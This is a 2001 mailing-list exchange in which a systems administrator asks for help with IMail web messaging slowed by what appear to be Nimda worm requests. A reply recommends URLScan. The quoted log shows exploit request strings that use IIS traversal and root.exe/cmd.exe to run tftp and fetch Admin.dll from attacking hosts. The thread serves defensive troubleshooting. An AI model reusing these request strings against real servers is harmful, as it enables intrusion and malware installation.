AW: [imail] DoS Attack on IMail Web Messaging?? HELP!

[INFO.TEC Guido Bunte]

Hallo charles,   its normal that the log tracks the nimda attacks… to filter and reject the attacks, you must run the microsoft-tool urlscan on you iis-server: http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/tools/URLscan.asp read the urlscan.txt!!!   good luck and best regards,   guido bunte INFO.TEC Systems     -----Urspr�ngliche Nachricht----- Von: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Im Auftrag von Charles Short Gesendet: Freitag, 21. September 2001 16:29 An: [EMAIL PROTECTED] Betreff: [imail] DoS Attack on IMail Web Messaging?? HELP!     Hello, � I know this message is long, but I called Ipswitch Support twice on Wednesday about a problem I am having with my IMail Server and the phone support I have gotten has not addressed my issue here and I need all the help I can get right now. I am running 7.03 HF1 on NT4 Server with SP6a. I am only running IMail on this machine. No IIS or other server programs.�   � We started seeing problems on Tuesday like everyone else, but we are running IMail on a server by itself... No IIS. I am seeing a lot of malformed header requests in the logs like the Code Red I & II virus does to IIS servers and -- this is the odd part -- some BRO*.tmp files in my spool directory that are most definitely being caused by people browsing WebMail. It is causing web messaging to crawl, but other than that I have not seen what everyone else seems to be seeing with the Nimda virus. No other characteristics of the Nimda virus at all. I honestly do not believe that we have been infected...   Here is a snippet from the logs... ------------------------------ 20010918 111401 208.180.242.21, , , GET /scripts/root.exe?/c+tftp%20-i%20208.180.242.21%20GET%20Admin.dll%20Admin.dll HTTP/1.0 20010918 111401 208.234.121.72, , , GET /MSADC/root.exe?/c+tftp%20-i%20208.234.120.89%20GET%20Admin.dll%20Admin.dll HTTP/1.0 20010918 111401 205.218.122.146, , , GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20205.218.122.146%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0 20010918 111401 208.234.121.72, , , GET /MSADC/Admin.dll HTTP/1.0 20010918 111401 205.218.122.146, , , GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20205.218.122.146%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0 20010918 111401 208.168.189.178, , , GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20208.168.189.178%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0 20010918 111402 205.218.55.2, , , GET /scripts/Admin.dll HTTP/1.0 20010918 111402 208.168.64.117, , , GET /scripts/root.exe?/c+tftp%20-i%20208.168.64.117%20GET%20Admin.dll%20Admin.dll HTTP/1.0 20010918 111402 208.168.189.178, , , GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20208.168.189.178%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0 20010918 111402 208.27.235.69, , , GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.27.235.69%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0 20010918 111402 205.197.162.130, , , GET /MSADC/root.exe?/c+tftp%20-i%20205.197.162.132%20GET%20Admin.dll%20Admin.dll HTTP/1.0 20010918 111402 208.217.166.229, , , GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0 20010918 111402 208.168.189.178, , , GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20208.168.189.178%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0 20010918 111402 208.177.252.132, , , GET /MSADC/root.exe?/c+tftp%20-i%20208.177.252.132%20GET%20Admin.dll%20Admin.dll HTTP/1.0 20010918 111402 208.234.121.72, , , GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0 20010918 111402 208.168.171.3, , , GET /scripts/root.exe?/c+tftp%20-i%20208.168.171.12%20GET%20Admin.dll%20Admin.dll HTTP/1.0 ------------------------------ � When I called the other day the assumption was that it was the Nimda virus and the Ipswitch support guys said to run a virus program and reload the web template files to fix it and that has done nothing at all to help. I even went ahead and made the upgrade from 6.06 to v.7.03 Wednesday night and no progress. I have all of the virus definitions for Norton and I've done SEVERAL system scans with Norton, House Call and the FIX_NIMDA.EXE program from Trend Micro and all came up empty handed. I just can’t believe that the Nimda has gotten into our system... Is anyone else seeing these BRO*.tmp files or is it just me?   � This seems to be a problem specific to IMail’s Web Messaging program not properly filtering out these malformed request. When Web Messaging is off, the server runs like a dream. It is one thing to patch an IIS server with a patch from the product vendor, but I honestly don’t have a clue as to what else I can do to stop this DoS attack from happening on my IMail box without implementing a firewall system for that server. I am seeing a ton of incoming traffic in our T1 logs so I know that it is coming in from the outside, but what I need to know is what can I do to make IMail filter out these requests? Help please…   Charles Short [EMAIL PROTECTED] Systems Administrator Orotech Web Services http://www.orotech.net 910.350.7980 voice 910.350.7976 fax